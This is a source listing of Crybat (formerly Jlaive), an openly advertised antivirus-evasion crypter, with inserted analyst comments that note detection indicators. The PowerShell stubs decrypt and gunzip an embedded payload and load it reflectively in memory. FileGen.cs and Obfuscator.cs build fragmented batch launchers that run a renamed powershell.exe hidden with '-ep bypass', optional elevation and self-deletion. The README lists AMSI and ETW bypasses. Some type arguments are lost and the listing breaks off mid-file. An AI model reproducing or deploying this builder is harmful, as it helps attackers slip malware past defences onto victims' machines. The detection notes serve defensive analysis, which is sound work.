├── version
├── Crybat
├── Resources
│ ├── runpe.dll
│ ├── XORStub.ps1
│ ├── AESStub.ps1
│ └── Stub.cs
├── FodyWeavers.xml
├── App.config
├── Properties
│ ├── Settings.settings
│ ├── Settings.Designer.cs
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ └── Resources.resx
├── Misc
│ ├── Settings.cs
│ └── Utils.cs
├── Program.cs
├── CodeGen
│ ├── FileGen.cs
│ └── StubGen.cs
├── CodeMod
│ ├── Obfuscator.cs
│ └── Patcher.cs
├── packages.config
├── Form1.resx
├── FodyWeavers.xsd
├── Form1.cs
├── Crybat.csproj
└── Form1.Designer.cs
├── LICENSE
├── README.md
└── Crybat.sln
/version:
--------------------------------------------------------------------------------
1 | v1.3.1
2 |
--------------------------------------------------------------------------------
/Crybat/Resources/runpe.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/witchfindertr/Jlaive/HEAD/Crybat/Resources/runpe.dll
--------------------------------------------------------------------------------
/Crybat/FodyWeavers.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Crybat/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Crybat/Properties/Settings.settings:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Crybat/Resources/XORStub.ps1:
--------------------------------------------------------------------------------
# PowerShell stage template, XOR variant. StubGen.CreatePS substitutes DECRYPTION_KEY, renames
# the *_var identifiers and removes the line breaks; FileGen.CreateBat then embeds the result in
# the generated batch file. '%~f0', '%*' and '%%' are therefore expanded by cmd.exe (batch file
# path, batch arguments, literal '%') before PowerShell parses the text.
# Analyst note: the key travels in the same command line as the code that uses it, so the blob
# on the ':: ' line can be recovered offline (base64 decode, XOR with the key, gunzip).
1 | $contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine);
# Takes the first line of the batch file that starts with ':: ' and drops that 3-character prefix.
2 | foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var = $line_var.Substring(3); break; }; };
3 | $payload_var = [System.Convert]::FromBase64String($lastline_var);
4 | $key_var = [System.Convert]::FromBase64String('DECRYPTION_KEY');
# Repeating-key XOR over the payload, in place.
5 | for ($i = 0; $i -le $payload_var.Length - 1; $i++) { $payload_var[$i] = ($payload_var[$i] -bxor $key_var[$i %% $key_var.Length]); };
# Gunzip the XOR output into a second MemoryStream.
6 | $msi_var = New-Object System.IO.MemoryStream(, $payload_var);
7 | $mso_var = New-Object System.IO.MemoryStream;
8 | $gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress);
9 | $gs_var.CopyTo($mso_var);
10 | $gs_var.Dispose();
11 | $msi_var.Dispose();
12 | $mso_var.Dispose();
# ToArray() is still valid on a disposed MemoryStream, so the order of these two lines works.
13 | $payload_var = $mso_var.ToArray();
# Loads the decompressed bytes as a .NET assembly straight from memory (this script writes no
# file) and calls its entry point with the batch arguments passed as one string.
# Detection note: a PowerShell command line that combines a base64 decode, GZipStream and a
# reflective assembly load is the behaviour to alert on; the variable names change per build.
14 | $obfstep1_var = [System.Reflection.Assembly]::Load($payload_var);
15 | $obfstep2_var = $obfstep1_var.EntryPoint;
16 | $obfstep2_var.Invoke($null, (, [string[]] ('%*')))
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 chash
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Crybat
2 |
3 | Crybat (previously known as Jlaive) is an antivirus evasion tool that can convert executables to undetectable batch files. .NET assemblies are not guaranteed to work.
4 |
5 | Join the Discord server for discussion and enquiries: https://discord.gg/Qzyq3Dqn82.
6 |
7 | ## Features
8 | - .NET/Native (x64) support
9 | - AES/XOR encryption
10 | - Compression
11 | - Anti Debug
12 | - Anti VM
13 | - Melt file (self delete)
14 | - Bind files
15 | - AMSI bypass
16 | - ETW bypass
17 |
18 | ## Screenshots
19 |
20 | 
21 | 
22 |
23 |
24 | ## Donate
25 | XMR: 47sQ8jVWGtb8iA5zJnnHmfFmu8GwibMs94JbhtutW9HNeYx9UAxWUNNF3NfE79pGm8bCBCFaF3R6CQEYADoF5Uv38m25SNt
26 |
27 | ## Credits
28 |
29 | C# RunPE: [https://github.com/nettitude/RunPE](https://github.com/nettitude/RunPE)
30 |
31 | ## Disclaimer
32 | This project was made for educational purposes only. I am not responsible if you choose to use this illegally/maliciously.
33 |
--------------------------------------------------------------------------------
/Crybat.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32516.85
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Crybat", "Crybat\Crybat.csproj", "{D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {C6803204-4415-411E-8D02-0D633E212A8A}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Crybat/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
// Designer-generated application-settings class. No individual setting properties are declared
// in this listing; the builder's own options are persisted separately by Crybat.Settings
// (Misc/Settings.cs) as JSON.
11 | namespace Crybat.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "17.2.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
// Single shared instance, wrapped by ApplicationSettingsBase.Synchronized.
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
// Accessor for the shared instance.
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/Crybat/Misc/Settings.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using Newtonsoft.Json;
4 |
5 | namespace Crybat
6 | {
// Loads and saves the builder's options as JSON in <application base directory>\bin\settings.json.
7 | public class Settings
8 | {
// Program.Main creates the "bin" directory at start-up, so Save can write here.
9 | private static string savepath = AppDomain.CurrentDomain.BaseDirectory + "\\bin\\settings.json";
10 |
// Returns the saved options, or null when no settings file exists yet.
// NOTE(review): as listed, DeserializeObject has no type argument and would return object,
// not SettingsObject; the generic argument was probably lost when the page was extracted.
11 | public static SettingsObject Load()
12 | {
13 | if (File.Exists(savepath))
14 | {
15 | return JsonConvert.DeserializeObject(File.ReadAllText(savepath));
16 | }
17 | return null;
18 | }
19 |
// Overwrites the settings file with the indented JSON form of obj.
20 | public static void Save(SettingsObject obj) => File.WriteAllText(savepath, JsonConvert.SerializeObject(obj, Formatting.Indented));
21 | }
22 |
// Plain data object written to and read from settings.json by the Settings class.
// The code that maps these properties to build options (Form1.cs) is not part of this listing;
// the names line up with the parameters of FileGen.CreateBat / StubGen.CreateCS and with the
// feature list in the README, presumably one flag per feature.
23 | public class SettingsObject
24 | {
25 | public string inputFile { get; set; }
26 | public bool antiDebug { get; set; }
27 | public bool antiVM { get; set; }
28 | public bool selfDelete { get; set; }
29 | public bool hidden { get; set; }
30 | public bool runas { get; set; }
31 | public bool aes { get; set; }
32 | public bool xor { get; set; }
33 | public string[] bindedFiles { get; set; }
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/Crybat/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Runtime.InteropServices;
5 | using System.Windows.Forms;
6 |
7 | namespace Crybat
8 | {
// Entry point of the builder's WinForms GUI.
9 | internal static class Program
10 | {
// user32 P/Invoke, called once before the form is created.
11 | [DllImport("user32.dll")]
12 | private static extern bool SetProcessDPIAware();
13 |
14 | [STAThread]
15 | static void Main()
16 | {
17 | string path = Process.GetCurrentProcess().MainModule.FileName;
// IndexOf(...) == 0 means the executable path begins with the temp directory; the program
// treats that as "started from inside a ZIP archive" and exits with code 1.
18 | if (path.IndexOf(Path.GetTempPath(), StringComparison.OrdinalIgnoreCase) == 0)
19 | {
20 | MessageBox.Show("Crybat cannot be run from a ZIP file! Please extract before running.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
21 | Environment.Exit(1);
22 | }
// Creates the "bin" directory that Settings uses for settings.json.
23 | if (!Directory.Exists(AppDomain.CurrentDomain.BaseDirectory + "\\bin")) Directory.CreateDirectory(AppDomain.CurrentDomain.BaseDirectory + "\\bin");
24 | SetProcessDPIAware();
25 | Application.EnableVisualStyles();
26 | Application.SetCompatibleTextRenderingDefault(false);
27 | Application.Run(new Form1());
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Crybat/Resources/AESStub.ps1:
--------------------------------------------------------------------------------
# PowerShell stage template, AES variant. StubGen.CreatePS substitutes DECRYPTION_KEY and
# DECRYPTION_IV, renames the *_var identifiers and removes the line breaks; FileGen.CreateBat
# then embeds the result in the generated batch file. '%~f0' and '%*' are expanded by cmd.exe
# (batch file path, batch arguments) before PowerShell parses the text.
# Analyst note: key and IV are base64 literals in the same command line, so the encryption only
# hides the payload from static scanning of the file; the blob on the ':: ' line can be
# recovered offline (base64 decode, AES-CBC decrypt, gunzip).
1 | $contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine);
# Takes the first line of the batch file that starts with ':: ' and drops that 3-character prefix.
2 | foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var = $line_var.Substring(3); break; }; };
3 | $payload_var = [System.Convert]::FromBase64String($lastline_var);
# AES in CBC mode with PKCS7 padding; same parameters as Utils.Encrypt on the builder side.
4 | $aes_var = New-Object System.Security.Cryptography.AesManaged;
5 | $aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC;
6 | $aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
7 | $aes_var.Key = [System.Convert]::FromBase64String('DECRYPTION_KEY');
8 | $aes_var.IV = [System.Convert]::FromBase64String('DECRYPTION_IV');
9 | $decryptor_var = $aes_var.CreateDecryptor();
10 | $payload_var = $decryptor_var.TransformFinalBlock($payload_var, 0, $payload_var.Length);
11 | $decryptor_var.Dispose();
12 | $aes_var.Dispose();
# Gunzip the decrypted bytes into a second MemoryStream.
13 | $msi_var = New-Object System.IO.MemoryStream(, $payload_var);
14 | $mso_var = New-Object System.IO.MemoryStream;
15 | $gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress);
16 | $gs_var.CopyTo($mso_var);
17 | $gs_var.Dispose();
18 | $msi_var.Dispose();
19 | $mso_var.Dispose();
# ToArray() is still valid on a disposed MemoryStream, so the order of these two lines works.
20 | $payload_var = $mso_var.ToArray();
# Loads the decompressed bytes as a .NET assembly straight from memory (this script writes no
# file) and calls its entry point with the batch arguments passed as one string.
# Detection note: a PowerShell command line that combines AesManaged, GZipStream and a
# reflective assembly load is the behaviour to alert on; the variable names change per build.
21 | $obfstep1_var = [System.Reflection.Assembly]::Load($payload_var);
22 | $obfstep2_var = $obfstep1_var.EntryPoint;
23 | $obfstep2_var.Invoke($null, (, [string[]] ('%*')))
--------------------------------------------------------------------------------
/Crybat/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
// Title and product are both "Crybat"; description, company and trademark are left empty.
8 | [assembly: AssemblyTitle("Crybat")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Crybat")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
// Same value as the project GUID in Crybat.sln. It identifies the builder executable, not
// the files the builder produces; the attributes of the generated stub (Stub.cs) are not
// part of this listing.
23 | [assembly: Guid("d6bba820-e9f7-4da3-a7d2-90a73871c0da")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
// Left at the template default; the release number of the tool is kept in the /version file.
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Crybat/CodeGen/FileGen.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 |
4 | namespace Crybat
5 | {
// Produces the text of the generated batch launcher.
6 | public class FileGen
7 | {
// Returns the batch file text (without the ':: ' payload line, which is not added here).
//   key, iv, mode - passed to StubGen.CreatePS to build the embedded PowerShell command.
//   hidden        - adds "-windowstyle hidden" to the PowerShell arguments.
//   selfdelete    - appends a line that deletes the batch file itself ("%~f0").
//   runas         - prepends an elevation check that relaunches the batch with -Verb runas.
//   rng           - source of the random variable names used by Obfuscator.GenCodeBat.
// Layout of the output: "@echo off", then every "set" line (Item1 of each GenCodeBat result),
// then the lines that expand those variables (Item2) in execution order.
// Detection notes, all visible in the strings below:
//   * powershell.exe is copied next to the batch file as "<batch name incl. extension>.exe"
//     ("%~dp0%~nx0.exe"), so PowerShell runs from a non-System32 path under another file name.
//     Telemetry that records the PE's original file name still identifies it as PowerShell.
//   * The copy is started with "-noprofile", "-ep bypass" and optionally "-windowstyle hidden".
//   * cmd.exe expands the %var% fragments before creating the process, so the process command
//     line contains the reassembled PowerShell text even though the file on disk is fragmented.
8 | public static string CreateBat(byte[] key, byte[] iv, EncryptionMode mode, bool hidden, bool selfdelete, bool runas, Random rng)
9 | {
10 | string command = StubGen.CreatePS(key, iv, mode, rng);
11 | StringBuilder output = new StringBuilder();
12 | output.AppendLine("@echo off");
13 |
14 | if (runas)
15 | {
// "net file" is written in clear text and its errorlevel is tested by the fragmented line
// that follows; on a non-zero result the batch restarts itself elevated, passing the current
// directory as %1, and the elevated instance changes back into it with "cd /d %1".
16 | string runascode =
17 | "if not %errorlevel%==0 ( powershell -noprofile -ep bypass -command Start-Process -FilePath '%0' -ArgumentList '%cd%' -Verb runas & exit /b )"
18 | + Environment.NewLine
19 | + "cd /d %1";
20 | var runasobf = Obfuscator.GenCodeBat(runascode, rng, 3);
21 | output.AppendLine("net file");
22 | output.AppendLine(runasobf.Item1 + Environment.NewLine + runasobf.Item2);
23 | }
24 |
// Fragment 1: the copy command; its destination is appended in clear text further down.
25 | var obfuscated = Obfuscator.GenCodeBat(@"copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /y ", rng, 4);
26 | output.AppendLine(obfuscated.Item1);
27 |
// Fragment 2: change into the batch file's own directory.
28 | var obfuscated2 = Obfuscator.GenCodeBat("cd %~dp0", rng, 4);
29 | output.AppendLine(obfuscated2.Item1);
30 |
// Fragment 3: PowerShell switches followed by the whole stub from StubGen.CreatePS.
31 | string commandstart = $"-noprofile {(hidden ? "-windowstyle hidden" : string.Empty)} -ep bypass -command ";
32 | var obfuscated3 = Obfuscator.GenCodeBat(commandstart + command, rng, 3);
33 | output.AppendLine(obfuscated3.Item1);
34 |
// Execution section: copy, clear the console, cd, then run the copied PowerShell.
35 | output.AppendLine(obfuscated.Item2 + "\"%~dp0%~nx0.exe\"");
36 | output.AppendLine("cls");
37 | output.AppendLine(obfuscated2.Item2);
38 | output.AppendLine("\"%~nx0.exe\" " + obfuscated3.Item2);
39 |
// Only the batch file is deleted by this line; the copied executable is not touched here.
40 | if (selfdelete) output.AppendLine("(goto) 2>nul & del \"%~f0\"");
41 | output.Append("exit /b");
42 | return output.ToString();
43 | }
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/Crybat/CodeMod/Obfuscator.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 |
5 | using static Crybat.Utils;
6 |
7 | namespace Crybat
8 | {
// Splits batch text into short fragments held in randomly named environment variables.
9 | public class Obfuscator
10 | {
// Returns a pair: Item1 is a block of shuffled `set "name=fragment"` lines, Item2 is the
// original text rewritten as %name% expansions (one output line per input line).
//   input - batch text, lines separated by Environment.NewLine.
//   rng   - supplies the variable names and the shuffle order.
//   level - controls the fragment length: the threshold is (5 - level) * 2 characters for
//           level > 1 and 10 for level <= 1, so a higher level gives shorter fragments.
// Analyst note: this only fragments the text on disk. cmd.exe substitutes the variables when
// it runs the Item2 lines, so the executed command lines are the original strings.
// NOTE(review): the List declarations below have no type arguments in this listing; they were
// probably lost when the page was extracted.
11 | public static (string, string) GenCodeBat(string input, Random rng, int level = 5)
12 | {
13 | string ret = string.Empty;
14 | string[] lines = input.Split(new string[] { Environment.NewLine }, StringSplitOptions.None);
15 |
16 | int amount = 5;
17 | if (level > 1) amount -= level;
18 | amount *= 2;
19 |
20 | List setlines = new List();
21 | List linevars = new List();
22 | foreach (string line in lines)
23 | {
24 | List splitted = new List();
25 | string sc = string.Empty;
26 | bool invar = false;
27 | foreach (char c in line)
28 | {
// '%' toggles the "inside a batch variable reference" state; no fragment boundary is placed
// while that state is set.
29 | if (c == '%')
30 | {
31 | invar = !invar;
32 | sc += c;
33 | continue;
34 | }
// A space, single quote or dot also ends the state; presumably for references that have no
// closing '%', such as %0, %1 or %~dp0.
35 | if ((c == ' ' || c == '\'' || c == '.') && invar)
36 | {
37 | invar = false;
38 | sc += c;
39 | continue;
40 | }
// Start a new fragment once the current one has reached the threshold length.
41 | if (!invar && sc.Length >= amount)
42 | {
43 | splitted.Add(sc);
44 | invar = false;
45 | sc = string.Empty;
46 | }
47 | sc += c;
48 | }
49 | splitted.Add(sc);
50 |
// One 10-letter variable per fragment; linevars keeps the names in order for each line.
51 | List vars = new List();
52 | foreach (string s in splitted)
53 | {
54 | string name = RandomString(10, rng);
55 | setlines.Add($"set \"{name}={s}\"");
56 | vars.Add(name);
57 | }
58 | linevars.Add(vars.ToArray());
59 | }
60 |
// Shuffle the set lines so their order on disk does not follow the original text.
61 | setlines = new List(setlines.OrderBy(x => rng.Next()));
62 | for (int i = 0; i < setlines.Count; i++)
63 | {
64 | ret += setlines[i];
// r is never read; the call still advances rng.
65 | int r = rng.Next(0, 2);
66 | ret += Environment.NewLine;
67 | }
68 |
69 | string varcalls = string.Empty;
70 | foreach (string[] line in linevars)
71 | {
72 | foreach (string s in line) varcalls += $"%{s}%";
73 | varcalls += Environment.NewLine;
74 | }
75 | return (ret.TrimEnd('\r', '\n'), varcalls.TrimEnd('\r', '\n'));
76 | }
77 | }
78 | }
--------------------------------------------------------------------------------
/Crybat/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
// Designer-generated resource wrapper. It declares no typed resource accessors in this listing;
// the stub templates are read through manifest resource streams in Utils instead.
11 | namespace Crybat.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources() {
33 | }
34 |
35 | ///
36 | /// Returns the cached ResourceManager instance used by this class.
37 | ///
38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 | internal static global::System.Resources.ResourceManager ResourceManager {
40 | get {
// Created on first use for the "Crybat.Properties.Resources" base name, then cached.
41 | if (object.ReferenceEquals(resourceMan, null)) {
42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Crybat.Properties.Resources", typeof(Resources).Assembly);
43 | resourceMan = temp;
44 | }
45 | return resourceMan;
46 | }
47 | }
48 |
49 | ///
50 | /// Overrides the current thread's CurrentUICulture property for all
51 | /// resource lookups using this strongly typed resource class.
52 | ///
53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 | internal static global::System.Globalization.CultureInfo Culture {
55 | get {
56 | return resourceCulture;
57 | }
58 | set {
59 | resourceCulture = value;
60 | }
61 | }
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/Crybat/Misc/Utils.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.IO.Compression;
4 | using System.Linq;
5 | using System.Reflection;
6 | using System.Security.Cryptography;
7 |
8 | namespace Crybat
9 | {
// Selects which branch Utils.Encrypt takes and which PowerShell stub StubGen.CreatePS embeds.
10 | public enum EncryptionMode
11 | {
12 | AES,
13 | XOR
14 | }
15 |
// Static helpers shared by the builder: embedded resources, encryption, compression, naming.
16 | public class Utils
17 | {
// Returns the bytes of the manifest resource called name.
// NOTE(review): GetManifestResourceStream returns null for an unknown name, which would
// surface here as a NullReferenceException at CopyTo; neither stream is disposed on failure.
18 | public static byte[] GetEmbeddedResource(string name)
19 | {
20 | Assembly asm = Assembly.GetExecutingAssembly();
21 | MemoryStream ms = new MemoryStream();
22 | Stream stream = asm.GetManifestResourceStream(name);
23 | stream.CopyTo(ms);
24 | stream.Dispose();
25 | byte[] ret = ms.ToArray();
26 | ms.Dispose();
27 | return ret;
28 | }
29 |
// Returns the manifest resource called name as text, read with StreamReader's default encoding.
30 | public static string GetEmbeddedString(string name)
31 | {
32 | Assembly asm = Assembly.GetExecutingAssembly();
33 | StreamReader stream = new StreamReader(asm.GetManifestResourceStream(name));
34 | string ret = stream.ReadToEnd();
35 | stream.Close();
36 | stream.Dispose();
37 | return ret;
38 | }
39 |
// Encrypts input with the selected mode and returns the result.
//   AES: AesManaged, CBC, PKCS7, using key and iv; returns a new array.
//   XOR: repeating-key XOR with key; iv is unused and input is overwritten in place, so the
//        returned array is the caller's own buffer.
// Returns null for any other enum value.
// Analyst note: the PowerShell stubs apply the inverse with the same key material, which
// StubGen writes into the generated batch file, so neither mode protects the payload from
// someone who holds that file.
40 | public static byte[] Encrypt(EncryptionMode type, byte[] input, byte[] key, byte[] iv)
41 | {
42 | switch (type)
43 | {
44 | case EncryptionMode.AES:
45 | {
46 | AesManaged aes = new AesManaged();
47 | aes.Mode = CipherMode.CBC;
48 | aes.Padding = PaddingMode.PKCS7;
49 | ICryptoTransform encryptor = aes.CreateEncryptor(key, iv);
50 | byte[] encrypted = encryptor.TransformFinalBlock(input, 0, input.Length);
51 | encryptor.Dispose();
52 | aes.Dispose();
53 | return encrypted;
54 | }
55 | case EncryptionMode.XOR:
56 | {
57 | for (int i = 0; i < input.Length; i++)
58 | {
59 | input[i] = (byte)(input[i] ^ key[i % key.Length]);
60 | }
61 | return input;
62 | }
63 | }
64 | return null;
65 | }
66 |
// Returns the gzip-compressed form of bytes.
67 | public static byte[] Compress(byte[] bytes)
68 | {
69 | MemoryStream msi = new MemoryStream(bytes);
70 | MemoryStream mso = new MemoryStream();
71 | GZipStream gs = new GZipStream(mso, CompressionMode.Compress);
72 | msi.CopyTo(gs);
// Disposing the GZipStream flushes the final gzip block into mso.
73 | gs.Dispose();
74 | mso.Dispose();
75 | msi.Dispose();
// ToArray() remains valid after a MemoryStream has been disposed.
76 | return mso.ToArray();
77 | }
78 |
// Returns length characters drawn from a-z and A-Z using the caller's System.Random.
// System.Random is not a cryptographic generator; how rng is seeded is not visible here.
79 | public static string RandomString(int length, Random rng)
80 | {
81 | string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
82 | return new string(Enumerable.Repeat(chars, length).Select(s => s[rng.Next(s.Length)]).ToArray());
83 | }
84 |
// True when AssemblyName.GetAssemblyName accepts the file at path; any exception, including
// a missing or unreadable file, is reported as false.
85 | public static bool IsAssembly(string path)
86 | {
87 | try
88 | {
89 | AssemblyName.GetAssemblyName(path);
90 | return true;
91 | }
92 | catch
93 | {
94 | return false;
95 | }
96 | }
97 | }
98 | }
99 |
--------------------------------------------------------------------------------
/Crybat/CodeMod/Patcher.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Reflection;
6 |
7 | using dnlib.DotNet;
8 | using dnlib.DotNet.Emit;
9 |
10 | namespace Crybat
11 | {
// Rewrites the IL of an input .NET module with dnlib.
12 | public class Patcher
13 | {
// Loads input as a module, patches every method body and returns the re-written module bytes.
// Patches applied, matched on the text form of each instruction:
//   * after an instruction mentioning ".bat.exe", ProcessModule::get_FileName() or
//     Assembly::get_Location(), a call to string.Replace(".bat.exe", ".bat") is inserted, so
//     the patched program sees a path ending in ".bat" rather than ".bat.exe";
//   * a call to Assembly::GetEntryAssembly() is replaced by Assembly.GetExecutingAssembly().
// Analyst note: ".bat.exe" is the name FileGen.CreateBat gives its copy of powershell.exe
// ("%~nx0.exe"), which makes that double extension a stable indicator for this tool.
14 | public static byte[] Fix(byte[] input)
15 | {
16 | ModuleDef module = ModuleDefMD.Load(input);
17 | foreach (TypeDef type in module.GetTypes())
18 | {
19 | if (type.IsGlobalModuleType) continue;
20 | foreach (MethodDef method in type.Methods)
21 | {
22 | if (!method.HasBody) continue;
// NOTE(review): IList has no type argument in this listing; probably lost in extraction.
23 | IList instr = method.Body.Instructions;
24 | for (var i = 0; i < instr.Count; i++)
25 | {
26 | if (instr[i].ToString().Contains(".bat.exe"))
27 | {
28 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe"));
29 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat"));
30 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1))));
// Skip the three inserted instructions; the inserted ldstr ".bat.exe" would otherwise match again.
31 | i += 3;
32 | }
33 | else if (instr[i].ToString().Contains("System.Diagnostics.ProcessModule::get_FileName()"))
34 | {
35 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe"));
36 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat"));
